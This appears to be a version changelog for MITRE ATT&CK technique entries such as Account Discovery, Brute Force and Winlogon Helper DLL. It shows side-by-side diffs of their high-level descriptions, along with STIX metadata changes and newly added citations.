external_references{'source_name': 'SANS 2', 'description': 'Joshua Wright. (2020, October 14). Retrieved March 22, 2024.', 'url': 'https://www.sans.org/blog/defense-spotlight-finding-hidden-windows-services/'}
x_mitre_contributorsWirapong Petshagun

[T1547.004] Boot or Logon Autostart Execution: Winlogon Helper DLL

Current version: 1.2

Version changed from: 1.1 → 1.2

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2023-08-14 15:11:30.220000+00:002024-02-14 21:24:37.780000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Creation
Patches

[T1087] Account Discovery

Current version: 2.4


Old Description
New Description
t1Adversaries may attempt to get a listing of valid accounts, t1Adversaries may attempt to get a listing of valid accounts, 
>usernames, or email addresses on a system or within a compro>usernames, or email addresses on a system or within a compro
>mised environment. This information can help adversaries det>mised environment. This information can help adversaries det
>ermine which accounts exist, which can aid in follow-on beha>ermine which accounts exist, which can aid in follow-on beha
>vior such as brute-forcing, spear-phishing attacks, or accou>vior such as brute-forcing, spear-phishing attacks, or accou
>nt takeovers (e.g., [Valid Accounts](https://attack.mitre.or>nt takeovers (e.g., [Valid Accounts](https://attack.mitre.or
>g/techniques/T1078)).  Adversaries may use several methods t>g/techniques/T1078)).  Adversaries may use several methods t
>o enumerate accounts, including abuse of existing tools, bui>o enumerate accounts, including abuse of existing tools, bui
>lt-in commands, and potential misconfigurations that leak ac>lt-in commands, and potential misconfigurations that leak ac
>count names and roles or permissions in the targeted environ>count names and roles or permissions in the targeted environ
>ment.  For examples, cloud environments typically provide ea>ment.  For examples, cloud environments typically provide ea
>sily accessible interfaces to obtain user lists. On hosts, a>sily accessible interfaces to obtain user lists.(Citation: A
>dversaries can use default [PowerShell](https://attack.mitre>WS List Users)(Citation: Google Cloud - IAM Servie Accounts 
>.org/techniques/T1059/001) and other command line functional>List API) On hosts, adversaries can use default [PowerShell]
>ity to identify accounts. Information about email addresses >(https://attack.mitre.org/techniques/T1059/001) and other co
>and accounts may also be extracted by searching an infected >mmand line functionality to identify accounts. Information a
>system’s files.>bout email addresses and accounts may also be extracted by s
 >earching an infected system’s files.

New Mitigations:

Details
values_changed
STIX FieldOld valueNew Value
modified2023-04-15 17:24:23.029000+00:002024-01-12 23:36:56.245000+00:00
descriptionAdversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., [Valid Accounts](https://attack.mitre.org/techniques/T1078)). Adversaries may use several methods to enumerate accounts, including abuse of existing tools, built-in commands, and potential misconfigurations that leak account names and roles or permissions in the targeted environment. For examples, cloud environments typically provide easily accessible interfaces to obtain user lists. On hosts, adversaries can use default [PowerShell](https://attack.mitre.org/techniques/T1059/001) and other command line functionality to identify accounts. Information about email addresses and accounts may also be extracted by searching an infected system’s files.Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., [Valid Accounts](https://attack.mitre.org/techniques/T1078)). Adversaries may use several methods to enumerate accounts, including abuse of existing tools, built-in commands, and potential misconfigurations that leak account names and roles or permissions in the targeted environment. For examples, cloud environments typically provide easily accessible interfaces to obtain user lists.(Citation: AWS List Users)(Citation: Google Cloud - IAM Servie Accounts List API) On hosts, adversaries can use default [PowerShell](https://attack.mitre.org/techniques/T1059/001) and other command line functionality to identify accounts. Information about email addresses and accounts may also be extracted by searching an infected system’s files.
x_mitre_attack_spec_version3.1.03.2.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'AWS List Users', 'description': 'Amazon. (n.d.). List Users. Retrieved August 11, 2020.', 'url': 'https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html'}
external_references{'source_name': 'Google Cloud - IAM Servie Accounts List API', 'description': 'Google. (2020, June 23). gcloud iam service-accounts list. Retrieved August 4, 2020.', 'url': 'https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list'}

[T1098] Account Manipulation

Current version: 2.6


Old Description
New Description
t1Adversaries may manipulate accounts to maintain and/or elevat1Adversaries may manipulate accounts to maintain and/or eleva
>te access to victim systems. Account manipulation may consis>te access to victim systems. Account manipulation may consis
>t of any action that preserves or modifies adversary access >t of any action that preserves or modifies adversary access 
>to a compromised account, such as modifying credentials or p>to a compromised account, such as modifying credentials or p
>ermission groups. These actions could also include account a>ermission groups.(Citation: FireEye SMOKEDHAM June 2021) The
>ctivity designed to subvert security policies, such as perfo>se actions could also include account activity designed to s
>rming iterative password updates to bypass password duration>ubvert security policies, such as performing iterative passw
> policies and preserve the life of compromised credentials. >ord updates to bypass password duration policies and preserv
>  In order to create or manipulate accounts, the adversary m>e the life of compromised credentials.   In order to create 
>ust already have sufficient permissions on systems or the do>or manipulate accounts, the adversary must already have suff
>main. However, account manipulation may also lead to privile>icient permissions on systems or the domain. However, accoun
>ge escalation where modifications grant access to additional>t manipulation may also lead to privilege escalation where m
> roles, permissions, or higher-privileged [Valid Accounts](h>odifications grant access to additional roles, permissions, 
>ttps://attack.mitre.org/techniques/T1078).>or higher-privileged [Valid Accounts](https://attack.mitre.o
 >rg/techniques/T1078).
Details
values_changed
STIX FieldOld valueNew Value
modified2023-10-16 17:45:54.884000+00:002024-01-16 22:24:38.234000+00:00
descriptionAdversaries may manipulate accounts to maintain and/or elevate access to victim systems. Account manipulation may consist of any action that preserves or modifies adversary access to a compromised account, such as modifying credentials or permission groups. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain. However, account manipulation may also lead to privilege escalation where modifications grant access to additional roles, permissions, or higher-privileged [Valid Accounts](https://attack.mitre.org/techniques/T1078).Adversaries may manipulate accounts to maintain and/or elevate access to victim systems. Account manipulation may consist of any action that preserves or modifies adversary access to a compromised account, such as modifying credentials or permission groups.(Citation: FireEye SMOKEDHAM June 2021) These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain. However, account manipulation may also lead to privilege escalation where modifications grant access to additional roles, permissions, or higher-privileged [Valid Accounts](https://attack.mitre.org/techniques/T1078).
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'FireEye SMOKEDHAM June 2021', 'description': 'FireEye. (2021, June 16). Smoking Out a DARKSIDE Affiliate’s Supply Chain Software Compromise. Retrieved September 22, 2021.', 'url': 'https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html'}

[T1098.002] Account Manipulation: Additional Email Delegate Permissions

Current version: 2.1


Old Description
New Description
t1Adversaries may grant additional permission levels to maintat1Adversaries may grant additional permission levels to mainta
>in persistent access to an adversary-controlled email accoun>in persistent access to an adversary-controlled email accoun
>t.   For example, the <code>Add-MailboxPermission</code> [Po>t.   For example, the <code>Add-MailboxPermission</code> [Po
>werShell](https://attack.mitre.org/techniques/T1059/001) cmd>werShell](https://attack.mitre.org/techniques/T1059/001) cmd
>let, available in on-premises Exchange and in the cloud-base>let, available in on-premises Exchange and in the cloud-base
>d service Office 365, adds permissions to a mailbox.(Citatio>d service Office 365, adds permissions to a mailbox.(Citatio
>n: Microsoft - Add-MailboxPermission)(Citation: FireEye APT3>n: Microsoft - Add-MailboxPermission)(Citation: FireEye APT3
>5 2018)(Citation: Crowdstrike Hiding in Plain Sight 2018) In>5 2018)(Citation: Crowdstrike Hiding in Plain Sight 2018) In
> Google Workspace, delegation can be enabled via the Google > Google Workspace, delegation can be enabled via the Google 
>Admin console and users can delegate accounts via their Gmai>Admin console and users can delegate accounts via their Gmai
>l settings.(Citation: Gmail Delegation)(Citation: Google Ens>l settings.(Citation: Gmail Delegation)(Citation: Google Ens
>uring Your Information is Safe)   Adversaries may also assig>uring Your Information is Safe)   Adversaries may also assig
>n mailbox folder permissions through individual folder permi>n mailbox folder permissions through individual folder permi
>ssions or roles. In Office 365 environments, adversaries may>ssions or roles. In Office 365 environments, adversaries may
> assign the Default or Anonymous user permissions or roles t> assign the Default or Anonymous user permissions or roles t
>o the Top of Information Store (root), Inbox, or other mailb>o the Top of Information Store (root), Inbox, or other mailb
>ox folders. By assigning one or both user permissions to a f>ox folders. By assigning one or both user permissions to a f
>older, the adversary can utilize any other account in the te>older, the adversary can utilize any other account in the te
>nant to maintain persistence to the target user’s mail folde>nant to maintain persistence to the target user’s mail folde
>rs.(Citation: Remediation and Hardening Strategies for Micro>rs.(Citation: Mandiant Defend UNC2452 White Paper)  This may
>soft 365 to Defend Against UNC2452)  This may be used in per> be used in persistent threat incidents as well as BEC (Busi
>sistent threat incidents as well as BEC (Business Email Comp>ness Email Compromise) incidents where an adversary can add 
>romise) incidents where an adversary can add [Additional Clo>[Additional Cloud Roles](https://attack.mitre.org/techniques
>ud Roles](https://attack.mitre.org/techniques/T1098/003) to >/T1098/003) to the accounts they wish to compromise. This ma
>the accounts they wish to compromise. This may further enabl>y further enable use of additional techniques for gaining ac
>e use of additional techniques for gaining access to systems>cess to systems. For example, compromised business accounts 
>. For example, compromised business accounts are often used >are often used to send messages to other accounts in the net
>to send messages to other accounts in the network of the tar>work of the target business while creating inbox rules (ex: 
>get business while creating inbox rules (ex: [Internal Spear>[Internal Spearphishing](https://attack.mitre.org/techniques
>phishing](https://attack.mitre.org/techniques/T1534)), so th>/T1534)), so the messages evade spam/phishing detection mech
>e messages evade spam/phishing detection mechanisms.(Citatio>anisms.(Citation: Bienstock, D. - Defending O365 - 2019)
>n: Bienstock, D. - Defending O365 - 2019) 
Details
values_changed
STIX FieldOld valueNew Value
modified2023-10-03 17:38:00.554000+00:002024-01-03 15:46:06.706000+00:00
descriptionAdversaries may grant additional permission levels to maintain persistent access to an adversary-controlled email account. For example, the Add-MailboxPermission [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.(Citation: Microsoft - Add-MailboxPermission)(Citation: FireEye APT35 2018)(Citation: Crowdstrike Hiding in Plain Sight 2018) In Google Workspace, delegation can be enabled via the Google Admin console and users can delegate accounts via their Gmail settings.(Citation: Gmail Delegation)(Citation: Google Ensuring Your Information is Safe) Adversaries may also assign mailbox folder permissions through individual folder permissions or roles. In Office 365 environments, adversaries may assign the Default or Anonymous user permissions or roles to the Top of Information Store (root), Inbox, or other mailbox folders. By assigning one or both user permissions to a folder, the adversary can utilize any other account in the tenant to maintain persistence to the target user’s mail folders.(Citation: Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452) This may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can add [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules (ex: [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)), so the messages evade spam/phishing detection mechanisms.(Citation: Bienstock, D. - Defending O365 - 2019)Adversaries may grant additional permission levels to maintain persistent access to an adversary-controlled email account. For example, the Add-MailboxPermission [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.(Citation: Microsoft - Add-MailboxPermission)(Citation: FireEye APT35 2018)(Citation: Crowdstrike Hiding in Plain Sight 2018) In Google Workspace, delegation can be enabled via the Google Admin console and users can delegate accounts via their Gmail settings.(Citation: Gmail Delegation)(Citation: Google Ensuring Your Information is Safe) Adversaries may also assign mailbox folder permissions through individual folder permissions or roles. In Office 365 environments, adversaries may assign the Default or Anonymous user permissions or roles to the Top of Information Store (root), Inbox, or other mailbox folders. By assigning one or both user permissions to a folder, the adversary can utilize any other account in the tenant to maintain persistence to the target user’s mail folders.(Citation: Mandiant Defend UNC2452 White Paper) This may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can add [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules (ex: [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)), so the messages evade spam/phishing detection mechanisms.(Citation: Bienstock, D. - Defending O365 - 2019)
external_references[7]['source_name']Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452Mandiant Defend UNC2452 White Paper
external_references[7]['description']Mike Burns, Matthew McWhirt, Douglas Bienstock, Nick Bennett. (2021, January 19). Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452. Retrieved September 25, 2021.Mandiant. (2021, January 19). Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452. Retrieved January 22, 2021.
external_references[7]['url']https://www.fireeye.com/blog/threat-research/2021/01/remediation-and-hardening-strategies-for-microsoft-365-to-defend-against-unc2452.htmlhttps://www.mandiant.com/resources/blog/remediation-and-hardening-strategies-for-microsoft-365-to-defend-against-unc2452

[T1560] Archive Collected Data

Current version: 1.0


Old Description
New Description
t1An adversary may compress and/or encrypt data that is collect1An adversary may compress and/or encrypt data that is collec
>ted prior to exfiltration. Compressing the data can help to >ted prior to exfiltration. Compressing the data can help to 
>obfuscate the collected data and minimize the amount of data>obfuscate the collected data and minimize the amount of data
> sent over the network. Encryption can be used to hide infor> sent over the network.(Citation: DOJ GRU Indictment Jul 201
>mation that is being exfiltrated from detection or make exfi>8) Encryption can be used to hide information that is being 
>ltration less conspicuous upon inspection by a defender.  Bo>exfiltrated from detection or make exfiltration less conspic
>th compression and encryption are done prior to exfiltration>uous upon inspection by a defender.  Both compression and en
>, and can be performed using a utility, 3rd party library, o>cryption are done prior to exfiltration, and can be performe
>r custom method.>d using a utility, 3rd party library, or custom method.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.2.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2022-01-04 18:44:10.398000+00:002024-01-20 00:07:58.958000+00:00
descriptionAn adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender. Both compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method.An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network.(Citation: DOJ GRU Indictment Jul 2018) Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender. Both compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method.
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'DOJ GRU Indictment Jul 2018', 'description': 'Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018.', 'url': 'https://www.justice.gov/file/1080281/download'}

[T1123] Audio Capture

Current version: 1.0


Old Description
New Description
t1An adversary can leverage a computer's peripheral devices (et1An adversary can leverage a computer's peripheral devices (e
>.g., microphones and webcams) or applications (e.g., voice a>.g., microphones and webcams) or applications (e.g., voice a
>nd video call services) to capture audio recordings for the >nd video call services) to capture audio recordings for the 
>purpose of listening into sensitive conversations to gather >purpose of listening into sensitive conversations to gather 
>information.  Malware or scripts may be used to interact wit>information.(Citation: ESET Attor Oct 2019)  Malware or scri
>h the devices through an available API provided by the opera>pts may be used to interact with the devices through an avai
>ting system or an application to capture audio. Audio files >lable API provided by the operating system or an application
>may be written to disk and exfiltrated later.> to capture audio. Audio files may be written to disk and ex
 >filtrated later.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2023-03-30 21:01:36.503000+00:002024-01-23 22:53:18.389000+00:00
descriptionAn adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information. Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later.An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.(Citation: ESET Attor Oct 2019) Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later.
x_mitre_attack_spec_version3.1.03.2.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'ESET Attor Oct 2019', 'description': 'Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020.', 'url': 'https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf'}

[T1020] Automated Exfiltration

Current version: 1.2


Old Description
New Description
t1Adversaries may exfiltrate data, such as sensitive documentst1Adversaries may exfiltrate data, such as sensitive documents
>, through the use of automated processing after being gather>, through the use of automated processing after being gather
>ed during Collection.   When automated exfiltration is used,>ed during Collection.(Citation: ESET Gamaredon June 2020)   
> other exfiltration techniques likely apply as well to trans>When automated exfiltration is used, other exfiltration tech
>fer the information out of the network, such as [Exfiltratio>niques likely apply as well to transfer the information out 
>n Over C2 Channel](https://attack.mitre.org/techniques/T1041>of the network, such as [Exfiltration Over C2 Channel](https
>) and [Exfiltration Over Alternative Protocol](https://attac>://attack.mitre.org/techniques/T1041) and [Exfiltration Over
>k.mitre.org/techniques/T1048).> Alternative Protocol](https://attack.mitre.org/techniques/T
 >1048).
Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-19 22:50:14.956000+00:002024-01-24 00:04:01.066000+00:00
descriptionAdversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection. When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection.(Citation: ESET Gamaredon June 2020) When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).
x_mitre_attack_spec_version2.1.03.2.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'ESET Gamaredon June 2020', 'description': 'Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020.', 'url': 'https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/'}

[T1110] Brute Force

Current version: 2.5


Old Description
New Description
t1Adversaries may use brute force techniques to gain access tot1Adversaries may use brute force techniques to gain access to
> accounts when passwords are unknown or when password hashes> accounts when passwords are unknown or when password hashes
> are obtained. Without knowledge of the password for an acco> are obtained.(Citation: TrendMicro Pawn Storm Dec 2020) Wit
>unt or set of accounts, an adversary may systematically gues>hout knowledge of the password for an account or set of acco
>s the password using a repetitive or iterative mechanism. Br>unts, an adversary may systematically guess the password usi
>ute forcing passwords can take place via interaction with a >ng a repetitive or iterative mechanism.(Citation: Dragos Cra
>service that will check the validity of those credentials or>shoverride 2018) Brute forcing passwords can take place via 
> offline against previously acquired credential data, such a>interaction with a service that will check the validity of t
>s password hashes.  Brute forcing credentials may take place>hose credentials or offline against previously acquired cred
> at various points during a breach. For example, adversaries>ential data, such as password hashes.  Brute forcing credent
> may attempt to brute force access to [Valid Accounts](https>ials may take place at various points during a breach. For e
>://attack.mitre.org/techniques/T1078) within a victim enviro>xample, adversaries may attempt to brute force access to [Va
>nment leveraging knowledge gathered from other post-compromi>lid Accounts](https://attack.mitre.org/techniques/T1078) wit
>se behaviors such as [OS Credential Dumping](https://attack.>hin a victim environment leveraging knowledge gathered from 
>mitre.org/techniques/T1003), [Account Discovery](https://att>other post-compromise behaviors such as [OS Credential Dumpi
>ack.mitre.org/techniques/T1087), or [Password Policy Discove>ng](https://attack.mitre.org/techniques/T1003), [Account Dis
>ry](https://attack.mitre.org/techniques/T1201). Adversaries >covery](https://attack.mitre.org/techniques/T1087), or [Pass
>may also combine brute forcing activity with behaviors such >word Policy Discovery](https://attack.mitre.org/techniques/T
>as [External Remote Services](https://attack.mitre.org/techn>1201). Adversaries may also combine brute forcing activity w
>iques/T1133) as part of Initial Access.>ith behaviors such as [External Remote Services](https://att
 >ack.mitre.org/techniques/T1133) as part of Initial Access.
Details
values_changed
STIX FieldOld valueNew Value
modified2023-04-14 23:03:34.362000+00:002024-01-29 18:53:26.593000+00:00
descriptionAdversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained. Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism. Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes. Brute forcing credentials may take place at various points during a breach. For example, adversaries may attempt to brute force access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) within a victim environment leveraging knowledge gathered from other post-compromise behaviors such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), [Account Discovery](https://attack.mitre.org/techniques/T1087), or [Password Policy Discovery](https://attack.mitre.org/techniques/T1201). Adversaries may also combine brute forcing activity with behaviors such as [External Remote Services](https://attack.mitre.org/techniques/T1133) as part of Initial Access.Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained.(Citation: TrendMicro Pawn Storm Dec 2020) Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism.(Citation: Dragos Crashoverride 2018) Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes. Brute forcing credentials may take place at various points during a breach. For example, adversaries may attempt to brute force access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) within a victim environment leveraging knowledge gathered from other post-compromise behaviors such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), [Account Discovery](https://attack.mitre.org/techniques/T1087), or [Password Policy Discovery](https://attack.mitre.org/techniques/T1201). Adversaries may also combine brute forcing activity with behaviors such as [External Remote Services](https://attack.mitre.org/techniques/T1133) as part of Initial Access.
x_mitre_attack_spec_version3.1.03.2.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'TrendMicro Pawn Storm Dec 2020', 'description': 'Hacquebord, F., Remorin, L. (2020, December 17). Pawn Storm’s Lack of Sophistication as a Strategy. Retrieved January 13, 2021.', 'url': 'https://www.trendmicro.com/en_us/research/20/l/pawn-storm-lack-of-sophistication-as-a-strategy.html'}
external_references{'source_name': 'Dragos Crashoverride 2018', 'description': 'Joe Slowik. (2018, October 12). Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE. Retrieved December 18, 2020.', 'url': 'https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf'}

[T1092] Communication Through Removable Media

Current version: 1.0


Old Description
New Description
t1Adversaries can perform command and control between compromit1Adversaries can perform command and control between compromi
>sed hosts on potentially disconnected networks using removab>sed hosts on potentially disconnected networks using removab
>le media to transfer commands from system to system. Both sy>le media to transfer commands from system to system.(Citatio
>stems would need to be compromised, with the likelihood that>n: ESET Sednit USBStealer 2014) Both systems would need to b
> an Internet-connected system was compromised first and the >e compromised, with the likelihood that an Internet-connecte
>second through lateral movement by [Replication Through Remo>d system was compromised first and the second through latera
>vable Media](https://attack.mitre.org/techniques/T1091). Com>l movement by [Replication Through Removable Media](https://
>mands and files would be relayed from the disconnected syste>attack.mitre.org/techniques/T1091). Commands and files would
>m to the Internet-connected system to which the adversary ha> be relayed from the disconnected system to the Internet-con
>s direct access.>nected system to which the adversary has direct access.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.2.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-07-14 19:44:50.871000+00:002024-01-31 03:17:42.004000+00:00
descriptionAdversaries can perform command and control between compromised hosts on potentially disconnected networks using removable media to transfer commands from system to system. Both systems would need to be compromised, with the likelihood that an Internet-connected system was compromised first and the second through lateral movement by [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091). Commands and files would be relayed from the disconnected system to the Internet-connected system to which the adversary has direct access.Adversaries can perform command and control between compromised hosts on potentially disconnected networks using removable media to transfer commands from system to system.(Citation: ESET Sednit USBStealer 2014) Both systems would need to be compromised, with the likelihood that an Internet-connected system was compromised first and the second through lateral movement by [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091). Commands and files would be relayed from the disconnected system to the Internet-connected system to which the adversary has direct access.
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'ESET Sednit USBStealer 2014', 'description': 'Calvet, J. (2014, November 11). Sednit Espionage Group Attacking Air-Gapped Networks. Retrieved January 4, 2017.', 'url': 'http://www.welivesecurity.com/2014/11/11/sednit-espionage-group-attacking-air-gapped-networks/'}

[T1136] Create Account

Current version: 2.4


Old Description
New Description
t1Adversaries may create an account to maintain access to victt1Adversaries may create an account to maintain access to vict
>im systems. With a sufficient level of access, creating such>im systems.(Citation: Symantec WastedLocker June 2020) With 
> accounts may be used to establish secondary credentialed ac>a sufficient level of access, creating such accounts may be 
>cess that do not require persistent remote access tools to b>used to establish secondary credentialed access that do not 
>e deployed on the system.  Accounts may be created on the lo>require persistent remote access tools to be deployed on the
>cal system or within a domain or cloud tenant. In cloud envi> system.  Accounts may be created on the local system or wit
>ronments, adversaries may create accounts that only have acc>hin a domain or cloud tenant. In cloud environments, adversa
>ess to specific services, which can reduce the chance of det>ries may create accounts that only have access to specific s
>ection.>ervices, which can reduce the chance of detection.
Details
values_changed
STIX FieldOld valueNew Value
modified2023-10-16 17:42:28.207000+00:002024-01-31 20:46:43.215000+00:00
descriptionAdversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system. Accounts may be created on the local system or within a domain or cloud tenant. In cloud environments, adversaries may create accounts that only have access to specific services, which can reduce the chance of detection.Adversaries may create an account to maintain access to victim systems.(Citation: Symantec WastedLocker June 2020) With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system. Accounts may be created on the local system or within a domain or cloud tenant. In cloud environments, adversaries may create accounts that only have access to specific services, which can reduce the chance of detection.
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Symantec WastedLocker June 2020', 'description': 'Symantec Threat Intelligence. (2020, June 25). WastedLocker: Symantec Identifies Wave of Attacks Against U.S. Organizations. Retrieved May 20, 2021.', 'url': 'https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us'}

[T1552.001] Unsecured Credentials: Credentials In Files

Current version: 1.2


Old Description
New Description
t1Adversaries may search local file systems and remote file sht1Adversaries may search local file systems and remote file sh
>ares for files containing insecurely stored credentials. The>ares for files containing insecurely stored credentials. The
>se can be files created by users to store their own credenti>se can be files created by users to store their own credenti
>als, shared credential stores for a group of individuals, co>als, shared credential stores for a group of individuals, co
>nfiguration files containing passwords for a system or servi>nfiguration files containing passwords for a system or servi
>ce, or source code/binary files containing embedded password>ce, or source code/binary files containing embedded password
>s.  It is possible to extract passwords from backups or save>s.  It is possible to extract passwords from backups or save
>d virtual machines through [OS Credential Dumping](https://a>d virtual machines through [OS Credential Dumping](https://a
>ttack.mitre.org/techniques/T1003). (Citation: CG 2014) Passw>ttack.mitre.org/techniques/T1003).(Citation: CG 2014) Passwo
>ords may also be obtained from Group Policy Preferences stor>rds may also be obtained from Group Policy Preferences store
>ed on the Windows Domain Controller. (Citation: SRD GPP)  In>d on the Windows Domain Controller.(Citation: SRD GPP)  In c
> cloud and/or containerized environments, authenticated user>loud and/or containerized environments, authenticated user a
> and service account credentials are often stored in local c>nd service account credentials are often stored in local con
>onfiguration and credential files.(Citation: Unit 42 Hildega>figuration and credential files.(Citation: Unit 42 Hildegard
>rd Malware) They may also be found as parameters to deployme> Malware) They may also be found as parameters to deployment
>nt commands in container logs.(Citation: Unit 42 Unsecured D> commands in container logs.(Citation: Unit 42 Unsecured Doc
>ocker Daemons) In some cases, these files can be copied and >ker Daemons) In some cases, these files can be copied and re
>reused on another machine or the contents can be read and th>used on another machine or the contents can be read and then
>en used to authenticate without needing to copy any files.(C> used to authenticate without needing to copy any files.(Cit
>itation: Specter Ops - Cloud Credential Storage)>ation: Specter Ops - Cloud Credential Storage)
Details
values_changed
STIX FieldOld valueNew Value
modified2023-08-23 22:24:50.812000+00:002024-04-15 21:33:00.213000+00:00
